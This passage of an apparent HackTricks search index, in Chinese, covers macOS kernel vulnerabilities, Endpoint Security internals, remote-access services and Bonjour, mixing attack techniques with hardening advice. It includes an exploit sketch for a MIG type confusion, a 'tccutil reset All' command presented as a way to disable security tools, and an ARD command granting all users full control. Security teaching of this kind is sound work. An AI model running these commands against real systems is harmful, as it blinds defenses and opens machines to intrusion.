2024: 在野外的内核0天漏洞 (CVE-2024-23225 & CVE-2024-23296)","id":"2190","title":"2024: 在野外的内核0天漏洞 (CVE-2024-23225 & CVE-2024-23296)"},"2191":{"body":"mach_msg() 请求发送到一个没有特权的 IOKit 用户客户端,导致 MIG 生成的胶水代码中的 类型混淆 。当回复消息被重新解释为一个比最初分配的更大的离线描述符时,攻击者可以实现对内核堆区域的受控 OOB 写入 ,并最终提升到 root。 原始概述(Sonoma 14.0-14.1,Ventura 13.5-13.6): c // userspace stub\\ntyped_port_t p = get_user_client();\\nuint8_t spray[0x4000] = {0x41};\\n// heap-spray via IOSurfaceFastSetValue\\nio_service_open_extended(...);\\n// malformed MIG message triggers confusion\\nmach_msg(&msg.header, MACH_SEND_MSG|MACH_RCV_MSG, ...); 公共漏洞利用该漏洞的方法包括: 用活动端口指针喷洒 ipc_kmsg 缓冲区。 覆盖悬挂端口的 ip_kobject。 使用 mprotect() 跳转到映射在 PAC 伪造地址的 shellcode。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Vulnerabilities » 2023: MIG 类型混淆 – CVE-2023-41075","id":"2191","title":"2023: MIG 类型混淆 – CVE-2023-41075"},"2192":{"body":"来自微软的安全研究人员显示,高权限守护进程 storagekitd 可以被迫加载一个 未签名的内核扩展 ,从而在完全修补的 macOS(15.2 之前)上完全禁用 系统完整性保护(SIP) 。攻击流程如下: 滥用私有权限 com.apple.storagekitd.kernel-management 在攻击者控制下生成一个助手。 助手调用 IOService::AddPersonalitiesFromKernelModule,并使用指向恶意 kext 包的精心制作的信息字典。 因为 SIP 信任检查是在 storagekitd 阶段后执行的,所以代码在验证之前以 ring-0 执行,并且可以通过 csr_set_allow_all(1) 关闭 SIP。 检测提示: bash kmutil showloaded | grep -v com.apple # list non-Apple kexts\\nlog stream --style syslog --predicate \'senderImagePath contains \\"storagekitd\\"\' # watch for suspicious child procs 立即修复的方法是更新到 macOS Sequoia 15.2 或更高版本。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Vulnerabilities » 2024-2025: 通过第三方 Kext 绕过 SIP – CVE-2024-44243(又名“Sigma”)","id":"2192","title":"2024-2025: 通过第三方 Kext 绕过 SIP – CVE-2024-44243(又名“Sigma”)"},"2193":{"body":"bash uname -a # Kernel build\\nkmutil showloaded # List loaded kernel extensions\\nkextstat | grep -v com.apple # Legacy (pre-Catalina) kext list\\nsysctl kern.kaslr_enable # Verify KASLR is ON (should be 1)\\ncsrutil status # Check SIP from 
RecoveryOS\\nspctl --status # Confirms Gatekeeper state","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Vulnerabilities » 快速枚举备忘单","id":"2193","title":"快速枚举备忘单"},"2194":{"body":"Luftrauser – Mach 消息模糊测试器,针对 MIG 子系统 (github.com/preshing/luftrauser)。 oob-executor – 用于 CVE-2024-23225 研究的 IPC 越界原语生成器。 kmutil inspect – 内置的 Apple 工具 (macOS 11+) 用于在加载前静态分析 kexts:kmutil inspect -b io.kext.bundleID。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Vulnerabilities » Fuzzing & Research Tools","id":"2194","title":"Fuzzing & Research Tools"},"2195":{"body":"Apple. “About the security content of macOS Sonoma 14.4.” https://support.apple.com/en-us/120895 Microsoft Security Blog. “Analyzing CVE-2024-44243, a macOS System Integrity Protection bypass through kernel extensions.” https://www.microsoft.com/en-us/security/blog/2025/01/13/analyzing-cve-2024-44243-a-macos-system-integrity-protection-bypass-through-kernel-extensions/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Vulnerabilities » References","id":"2195","title":"References"},"2196":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS System Extensions » macOS 系统扩展","id":"2196","title":"macOS 系统扩展"},"2197":{"body":"与内核扩展不同, 系统扩展在用户空间中运行 ,而不是内核空间,从而降低了由于扩展故障导致系统崩溃的风险。 系统扩展有三种类型: DriverKit 扩展、 网络 扩展和 端点安全 扩展。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS System Extensions » 系统扩展 / 端点安全框架","id":"2197","title":"系统扩展 / 端点安全框架"},"2198":{"body":"DriverKit 是内核扩展的替代品, 提供硬件支持 。它允许设备驱动程序(如 USB、串行、NIC 和 HID 驱动程序)在用户空间中运行,而不是内核空间。DriverKit 框架包括 某些 I/O Kit 类的用户空间版本 ,内核将正常的 I/O Kit 事件转发到用户空间,为这些驱动程序提供了一个更安全的运行环境。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS System Extensions » DriverKit 扩展","id":"2198","title":"DriverKit 扩展"},"2199":{"body":"网络扩展提供了自定义网络行为的能力。网络扩展有几种类型: 应用代理 :用于创建实现流式定制 VPN 协议的 VPN 客户端。这意味着它根据连接(或流)而不是单个数据包处理网络流量。 数据包隧道 :用于创建实现数据包导向定制 VPN 协议的 VPN 客户端。这意味着它根据单个数据包处理网络流量。 过滤数据 :用于过滤网络“流”。它可以在流级别监控或修改网络数据。 过滤数据包 :用于过滤单个网络数据包。它可以在数据包级别监控或修改网络数据。 DNS 代理 :用于创建自定义 DNS 提供程序。它可以用于监控或修改 DNS 请求和响应。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS System Extensions » 网络扩展","id":"2199","title":"网络扩展"},"22":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"About the author » 关于作者","id":"22","title":"关于作者"},"220":{"body":"在确定与组织相关的 IPv6 地址后,可以使用 ping6 工具进行探测。该工具有助于评估识别出的 IPv6 地址的响应能力,并可能帮助发现相邻的 IPv6 设备。","breadcrumbs":"Pentesting Network » Pentesting IPv6 » 使用 Ping6 进行探测","id":"220","title":"使用 Ping6 进行探测"},"2200":{"body":"端点安全是 Apple 在 macOS 中提供的一个框架,提供了一组用于系统安全的 API。它旨在供 安全供应商和开发人员构建能够监控和控制系统活动 的产品,以识别和防止恶意活动。 该框架提供了一组 监控和控制系统活动的 API ,例如进程执行、文件系统事件、网络和内核事件。 该框架的核心在内核中实现,作为位于 /System/Library/Extensions/EndpointSecurity.kext 的内核扩展(KEXT)。该 KEXT 由几个关键组件组成: EndpointSecurityDriver :作为内核扩展的“入口点”。它是操作系统与端点安全框架之间的主要交互点。 EndpointSecurityEventManager :该组件负责实现内核钩子。内核钩子允许框架通过拦截系统调用来监控系统事件。 EndpointSecurityClientManager :管理与用户空间客户端的通信,跟踪哪些客户端已连接并需要接收事件通知。 EndpointSecurityMessageManager :向用户空间客户端发送消息和事件通知。 端点安全框架可以监控的事件分为: 文件事件 进程事件 套接字事件 内核事件(例如加载/卸载内核扩展或打开 I/O Kit 设备)","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS System Extensions » 端点安全框架","id":"2200","title":"端点安全框架"},"2201":{"body":"与端点安全框架的用户空间通信 通过 IOUserClient 类进行。根据调用者的类型使用两种不同的子类: EndpointSecurityDriverClient :这需要 com.apple.private.endpoint-security.manager 权限,仅由系统进程 endpointsecurityd 持有。 EndpointSecurityExternalClient :这需要 com.apple.developer.endpoint-security.client 权限。通常由需要与端点安全框架交互的第三方安全软件使用。 端点安全扩展: libEndpointSecurity.dylib 是系统扩展用于与内核通信的 C 库。该库使用 I/O Kit (IOKit) 与端点安全 KEXT 进行通信。 endpointsecurityd 是一个关键的系统守护进程,负责管理和启动端点安全系统扩展,特别是在早期启动过程中。 只有标记为 NSEndpointSecurityEarlyBoot 的系统扩展 在其 Info.plist 文件中接收这种早期启动处理。 另一个系统守护进程, sysextd , 验证系统扩展 并将其移动到适当的系统位置。然后,它请求相关守护进程加载扩展。 SystemExtensions.framework 负责激活和停用系统扩展。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS System Extensions » 端点安全框架架构","id":"2201","title":"端点安全框架架构"},"2202":{"body":"ESF 被安全工具使用,这些工具会尝试检测红队人员,因此任何关于如何避免这一点的信息都很有趣。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS System Extensions » 绕过 
ESF","id":"2202","title":"绕过 ESF"},"2203":{"body":"问题在于安全应用程序需要具有 完全磁盘访问权限 。因此,如果攻击者能够移除该权限,他可以阻止软件运行: bash tccutil reset All 有关此绕过及相关内容的 更多信息 ,请查看演讲 #OBTS v5.0: \\"The Achilles Heel of EndpointSecurity\\" - Fitzl Csaba 最终,通过将新的权限 kTCCServiceEndpointSecurityClient 授予由 tccd 管理的安全应用程序来修复此问题,因此 tccutil 不会清除其权限,从而防止其运行。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS System Extensions » CVE-2021-30965","id":"2203","title":"CVE-2021-30965"},"2204":{"body":"OBTS v3.0: \\"Endpoint Security & Insecurity\\" - Scott Knight https://knight.sc/reverse%20engineering/2019/08/24/system-extension-internals.html tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS System Extensions » 参考文献","id":"2204","title":"参考文献"},"2205":{"body":"Reading time: 13 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Network Services & Protocols » macOS 网络服务与协议","id":"2205","title":"macOS 网络服务与协议"},"2206":{"body":"这些是常见的 macOS 服务,可以远程访问它们。 您可以在 System Settings --> Sharing 中启用/禁用这些服务。 VNC ,称为“屏幕共享”(tcp:5900) SSH ,称为“远程登录”(tcp:22) Apple Remote Desktop (ARD),或称为“远程管理”(tcp:3283, tcp:5900) AppleEvent ,称为“远程 Apple 事件”(tcp:3031) 检查是否启用了任何服务,运行: bash rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep \\"*.3283\\" | wc -l);\\nscrShrng=$(netstat -na | grep LISTEN | egrep \'tcp4|tcp6\' | grep \\"*.5900\\" | wc -l);\\nflShrng=$(netstat -na | grep LISTEN | egrep \'tcp4|tcp6\' | egrep \\"\\\\\\\\*.88|\\\\\\\\*.445|\\\\\\\\*.548\\" | wc -l);\\nrLgn=$(netstat -na | grep LISTEN | egrep \'tcp4|tcp6\' | grep \\"*.22\\" | wc -l);\\nrAE=$(netstat -na | grep LISTEN | egrep \'tcp4|tcp6\' | grep \\"*.3031\\" | wc -l);\\nbmM=$(netstat -na | grep LISTEN | egrep \'tcp4|tcp6\' | grep \\"*.4488\\" | wc -l);\\nprintf \\"\\\\nThe following services are OFF if \'0\', or ON otherwise:\\\\nScreen Sharing: %s\\\\nFile Sharing: %s\\\\nRemote Login: %s\\\\nRemote Mgmt: %s\\\\nRemote Apple Events: %s\\\\nBack to My Mac: %s\\\\n\\\\n\\" \\"$scrShrng\\" \\"$flShrng\\" \\"$rLgn\\" \\"$rmMgmt\\" \\"$rAE\\" \\"$bmM\\";","breadcrumbs":"macOS Security & Privilege Escalation » macOS Network Services & Protocols » 远程访问服务","id":"2206","title":"远程访问服务"},"2207":{"body":"Apple Remote Desktop (ARD) 是一个针对 macOS 的增强版 Virtual Network Computing (VNC) ,提供额外的功能。ARD 中一个显著的漏洞是其控制屏幕密码的认证方法,仅使用密码的前 8 个字符,使其容易受到 brute force attacks 的攻击,使用像 Hydra 或 GoRedShell 这样的工具,因为没有默认的速率限制。 可以使用 nmap 的 vnc-info 脚本识别易受攻击的实例。支持 VNC Authentication (2) 的服务由于 8 个字符密码的截断,尤其容易受到暴力攻击。 要启用 ARD 以进行特权提升、GUI 访问或用户监控等各种管理任务,请使用以下命令: bash sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -allowAccessFor -allUsers -privs -all -clientopts -setmenuextra -menuextra yes ARD 
提供多种控制级别,包括观察、共享控制和完全控制,且会话在用户密码更改后仍然持续。它允许直接发送 Unix 命令,并以 root 身份执行这些命令,适用于管理用户。任务调度和远程 Spotlight 搜索是显著特性,便于在多台机器上进行低影响的敏感文件远程搜索。 最近的屏幕共享 / ARD 漏洞 (2023-2025) 年份 CVE 组件 影响 修复于 2023 CVE-2023-42940 屏幕共享 不正确的会话渲染可能导致传输 错误 的桌面或窗口,从而泄露敏感信息 macOS Sonoma 14.2.1 (2023年12月) 2024 CVE-2024-23296 launchservicesd / login 内核内存保护绕过,可在成功远程登录后链接(在野外被积极利用) macOS Ventura 13.6.4 / Sonoma 14.4 (2024年3月) 加固建议 在不严格需要时禁用 屏幕共享 / 远程管理 。 保持 macOS 完全更新(Apple 通常为最近三个主要版本发布安全修复)。 使用 强密码 并 在可能的情况下强制*“VNC 观看者可能使用密码控制屏幕”*选项 禁用 。 将服务放在 VPN 后面,而不是将 TCP 5900/3283 暴露于互联网。 添加应用防火墙规则,将 ARDAgent 限制在本地子网内: bash sudo /usr/libexec/ApplicationFirewall/socketfilterfw --add /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent\\nsudo /usr/libexec/ApplicationFirewall/socketfilterfw --setblockapp /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent on","breadcrumbs":"macOS Security & Privilege Escalation » macOS Network Services & Protocols » Pentesting ARD","id":"2207","title":"Pentesting ARD"},"2208":{"body":"Bonjour 是一项由 Apple 设计的技术,允许 同一网络上的设备检测彼此提供的服务 。也称为 Rendezvous、 零配置 或 Zeroconf,它使设备能够加入 TCP/IP 网络, 自动选择 IP 地址 ,并将其服务广播给其他网络设备。 Bonjour 提供的零配置网络确保设备可以: 自动获取 IP 地址 ,即使在没有 DHCP 服务器的情况下。 执行 名称到地址的转换 ,而无需 DNS 服务器。 发现 网络上可用的服务。 使用 Bonjour 的设备将自我分配一个 来自 169.254/16 范围的 IP 地址 ,并验证其在网络上的唯一性。Mac 会为该子网维护一个路由表条目,可以通过 netstat -rn | grep 169 验证。 对于 DNS,Bonjour 使用 多播 DNS (mDNS) 协议 。mDNS 在 5353/UDP 端口 上运行,采用 标准 DNS 查询 ,但目标是 多播地址 224.0.0.251 。这种方法确保网络上所有监听设备都能接收并响应查询,从而促进其记录的更新。 加入网络时,每个设备自我选择一个名称,通常以**.local** 结尾,可能源自主机名或随机生成。 网络内的服务发现由 DNS 服务发现 (DNS-SD) 促进。利用 DNS SRV 记录的格式,DNS-SD 使用 DNS PTR 记录 来启用多个服务的列出。寻求特定服务的客户端将请求 . 的 PTR 记录,如果该服务可从多个主机提供,则返回格式为 .. 
的 PTR 记录列表。 可以使用 dns-sd 工具来 发现和广告网络服务 。以下是其用法的一些示例:","breadcrumbs":"macOS Security & Privilege Escalation » macOS Network Services & Protocols » Bonjour 协议","id":"2208","title":"Bonjour 协议"},"2209":{"body":"要在网络上搜索 SSH 服务,可以使用以下命令: bash dns-sd -B _ssh._tcp 此命令启动对 _ssh._tcp 服务的浏览,并输出详细信息,如时间戳、标志、接口、域、服务类型和实例名称。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Network Services & Protocols » 搜索 SSH 服务","id":"2209","title":"搜索 SSH 服务"},"221":{"body":"以下部分涵盖可以在 同一 /64 段内 执行的实际层 2 IPv6 攻击,而无需知道任何全局前缀。下面显示的所有数据包都是 链路本地 的,仅通过本地交换机传输,使它们在大多数环境中极其隐蔽。","breadcrumbs":"Pentesting Network » Pentesting IPv6 » IPv6 本地网络攻击技术","id":"221","title":"IPv6 本地网络攻击技术"},"2210":{"body":"要广播 HTTP 服务,您可以使用: bash dns-sd -R \\"Index\\" _http._tcp . 80 path=/index.html 此命令在端口 80 上注册一个名为 \\"Index\\" 的 HTTP 服务,路径为 /index.html。 然后在网络上搜索 HTTP 服务: bash dns-sd -B _http._tcp 当服务启动时,它通过多播其存在向子网中的所有设备宣布其可用性。对这些服务感兴趣的设备无需发送请求,只需监听这些公告。 为了提供更友好的用户界面,可以在 Apple App Store 上使用 Discovery - DNS-SD Browser 应用程序可视化您本地网络上提供的服务。 或者,可以编写自定义脚本使用 python-zeroconf 库浏览和发现服务。 python-zeroconf 脚本演示了如何为 _http._tcp.local. 
服务创建服务浏览器,打印添加或移除的服务: python from zeroconf import ServiceBrowser, Zeroconf class MyListener: def remove_service(self, zeroconf, type, name):\\nprint(\\"Service %s removed\\" % (name,)) def add_service(self, zeroconf, type, name):\\ninfo = zeroconf.get_service_info(type, name)\\nprint(\\"Service %s added, service info: %s\\" % (name, info)) zeroconf = Zeroconf()\\nlistener = MyListener()\\nbrowser = ServiceBrowser(zeroconf, \\"_http._tcp.local.\\", listener)\\ntry:\\ninput(\\"Press enter to exit...\\\\n\\\\n\\")\\nfinally:\\nzeroconf.close()","breadcrumbs":"macOS Security & Privilege Escalation » macOS Network Services & Protocols » 广播 HTTP 服务","id":"2210","title":"广播 HTTP 服务"},"2211":{"body":"Nmap NSE – 发现单个主机广告的服务: bash nmap -sU -p 5353 --script=dns-service-discovery dns-service-discovery 脚本发送一个 _services._dns-sd._udp.local 查询,然后枚举每个广告的服务类型。 mdns_recon – 一个 Python 工具,扫描整个范围以寻找 配置错误 的 mDNS 响应者,这些响应者回答单播查询(有助于找到跨子网/WAN 可达的设备): bash git clone https://github.com/chadillac/mdns_recon && cd mdns_recon\\npython3 mdns_recon.py -r 192.0.2.0/24 -s _ssh._tcp.local 这将返回通过 Bonjour 在本地链路外暴露 SSH 的主机。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Network Services & Protocols » 在网络上枚举 Bonjour","id":"2211","title":"在网络上枚举 Bonjour"},"2212":{"body":"年份 CVE 严重性 问题 修复版本 2024 CVE-2024-44183 中等 在 mDNSResponder 中的逻辑错误允许一个构造的包触发 拒绝服务 macOS Ventura 13.7 / Sonoma 14.7 / Sequoia 15.0 (2024年9月) 2025 CVE-2025-31222 高 在 mDNSResponder 中的正确性问题可能被滥用以进行 本地特权提升 macOS Ventura 13.7.6 / Sonoma 14.7.6 / Sequoia 15.5 (2025年5月) 缓解指导 将 UDP 5353 限制为 链路本地 范围 – 在无线控制器、路由器和基于主机的防火墙上阻止或限速。 在不需要服务发现的系统上完全禁用 Bonjour: bash sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.mDNSResponder.plist 对于内部需要 Bonjour 但绝不能跨越网络边界的环境,使用 AirPlay Receiver 配置限制 (MDM) 或 mDNS 代理。 启用 系统完整性保护 (SIP) 并保持 macOS 更新 – 上述两个漏洞都迅速修复,但依赖于启用 SIP 以获得全面保护。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Network Services & Protocols » 安全考虑与近期漏洞 (2024-2025)","id":"2212","title":"安全考虑与近期漏洞 
(2024-2025)"},"2213":{"body":"如果出于安全或其他原因需要禁用 Bonjour,可以使用以下命令关闭它: bash sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.mDNSResponder.plist","breadcrumbs":"macOS Security & Privilege Escalation » macOS Network Services & Protocols » 禁用 Bonjour","id":"2213","title":"禁用 Bonjour"},"2214":{"body":"The Mac Hacker\'s Handbook https://taomm.org/vol1/analysis.html https://lockboxx.blogspot.com/2019/07/macos-red-teaming-206-ard-apple-remote.html NVD – CVE-2023-42940 NVD – CVE-2024-44183 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Network Services & Protocols » 参考文献","id":"2214","title":"参考文献"},"2215":{"body":"Reading time: 4 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS File Extension & URL scheme app handlers » macOS 文件扩展名和 URL 方案应用程序处理程序","id":"2215","title":"macOS 文件扩展名和 URL 方案应用程序处理程序"},"2216":{"body":"这是一个包含 macOS 中所有已安装应用程序的数据库,可以查询以获取有关每个已安装应用程序的信息,例如它支持的 URL 方案和 MIME 类型。 可以使用以下命令导出此数据库: /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister -dump 或使用工具 lsdtrip 。 /usr/libexec/lsd 是数据库的核心。它提供 多个 XPC 服务 ,如 .lsd.installation、.lsd.open、.lsd.openurl 等。但它也 要求某些权限 以便应用程序能够使用暴露的 XPC 功能,如 .launchservices.changedefaulthandler 或 .launchservices.changeurlschemehandler 来更改 MIME 类型或 URL 方案的默认应用程序等。 /System/Library/CoreServices/launchservicesd 声明服务 com.apple.coreservices.launchservicesd,可以查询以获取有关正在运行的应用程序的信息。可以使用系统工具 / usr/bin/lsappinfo 或 lsdtrip 进行查询。","breadcrumbs":"macOS Security & Privilege Escalation » macOS File Extension & URL scheme app handlers » LaunchServices 数据库","id":"2216","title":"LaunchServices 数据库"},"2217":{"body":"以下行可以用于查找可以根据扩展名打开文件的应用程序: bash /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister -dump | grep -E \\"path:|bindings:|name:\\" 或者使用类似于 SwiftDefaultApps : bash ./swda getSchemes #Get all the available schemes\\n./swda getApps #Get all the apps declared\\n./swda getUTIs #Get all the UTIs\\n./swda getHandler --URL ftp #Get ftp handler 您还可以通过以下方式检查应用程序支持的扩展: cd /Applications/Safari.app/Contents\\ngrep -A3 CFBundleTypeExtensions Info.plist | grep string\\ncss\\npdf\\nwebarchive\\nwebbookmark\\nwebhistory\\nwebloc\\ndownload\\nsafariextz\\ngif\\nhtml\\nhtm\\njs\\njpg\\njpeg\\njp2\\ntxt\\ntext\\npng\\ntiff\\ntif\\nurl\\nico\\nxhtml\\nxht\\nxml\\nxbl\\nsvg tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 
HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS File Extension & URL scheme app handlers » 文件扩展名和 URL 方案应用程序处理程序","id":"2217","title":"文件扩展名和 URL 方案应用程序处理程序"},"2218":{"body":"Reading time: 18 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS 文件、文件夹、二进制文件和内存","id":"2218","title":"macOS 文件、文件夹、二进制文件和内存"},"2219":{"body":"/Applications : 安装的应用程序应在此处。所有用户都可以访问它们。 /bin : 命令行二进制文件 /cores : 如果存在,用于存储核心转储 /dev : 一切都被视为文件,因此您可能会看到存储在此处的硬件设备。 /etc : 配置文件 /Library : 可以在此找到许多与偏好设置、缓存和日志相关的子目录和文件。根目录和每个用户目录中都有一个 Library 文件夹。 /private : 未记录,但许多提到的文件夹是指向私有目录的符号链接。 /sbin : 重要的系统二进制文件(与管理相关) /System : 使 OS X 运行的文件。您在此处主要会找到 Apple 特定的文件(而非第三方)。 /tmp : 文件在 3 天后被删除(这是指向 /private/tmp 的软链接) /Users : 用户的主目录。 /usr : 配置和系统二进制文件 /var : 日志文件 /Volumes : 挂载的驱动器将在此处出现。 /.vol : 运行 stat a.txt 您将获得类似 16777223 7545753 -rw-r--r-- 1 username wheel ... 
的内容,其中第一个数字是文件所在卷的 ID 号,第二个是 inode 号。您可以通过 /.vol/ 使用该信息访问此文件的内容,运行 cat /.vol/16777223/7545753","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » 文件层次结构","id":"2219","title":"文件层次结构"},"222":{"body":"在玩弄 IPv6 流量之前,建议对您的设备进行加固,以避免被自己的测试所污染,并在大规模数据包注入/嗅探期间获得最佳性能。 bash # Enable promiscuous mode to capture all frames\\nsudo ip link set dev eth0 promisc on # Ignore rogue Router Advertisements & Redirects coming from the segment\\nsudo sysctl -w net.ipv6.conf.all.accept_ra=0\\nsudo sysctl -w net.ipv6.conf.all.accept_redirects=0 # Increase fd / backlog limits when generating lots of traffic\\nsudo sysctl -w fs.file-max=100000\\nsudo sysctl -w net.core.somaxconn=65535\\nsudo sysctl -w net.ipv4.tcp_tw_reuse=1","breadcrumbs":"Pentesting Network » Pentesting IPv6 » 为稳定实验室进行系统调优","id":"222","title":"为稳定实验室进行系统调优"},"2220":{"body":"系统应用程序 位于 /System/Applications 下 已安装 的应用程序通常安装在 /Applications 或 ~/Applications 中 应用程序数据 可以在 /Library/Application Support 中找到,适用于以 root 身份运行的应用程序,以及在 ~/Library/Application Support 中找到,适用于以用户身份运行的应用程序。 第三方应用程序 守护进程 需要以 root 身份运行,通常位于 /Library/PrivilegedHelperTools/ 沙盒 应用程序映射到 ~/Library/Containers 文件夹。每个应用程序都有一个根据应用程序的包 ID 命名的文件夹(com.apple.Safari)。 内核 位于 /System/Library/Kernels/kernel Apple 的内核扩展 位于 /System/Library/Extensions 第三方内核扩展 存储在 /Library/Extensions","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » 应用程序文件夹","id":"2220","title":"应用程序文件夹"},"2221":{"body":"MacOS 在多个地方存储信息,例如密码: macOS Sensitive Locations & Interesting Daemons","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » 包含敏感信息的文件","id":"2221","title":"包含敏感信息的文件"},"2222":{"body":"macOS Installers Abuse","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » 易受攻击的 pkg 安装程序","id":"2222","title":"易受攻击的 pkg 安装程序"},"2223":{"body":".dmg : Apple 磁盘映像文件在安装程序中非常常见。 .kext : 必须遵循特定结构,是 OS X 版本的驱动程序。(这是一个包) .plist : 也称为属性列表,以 
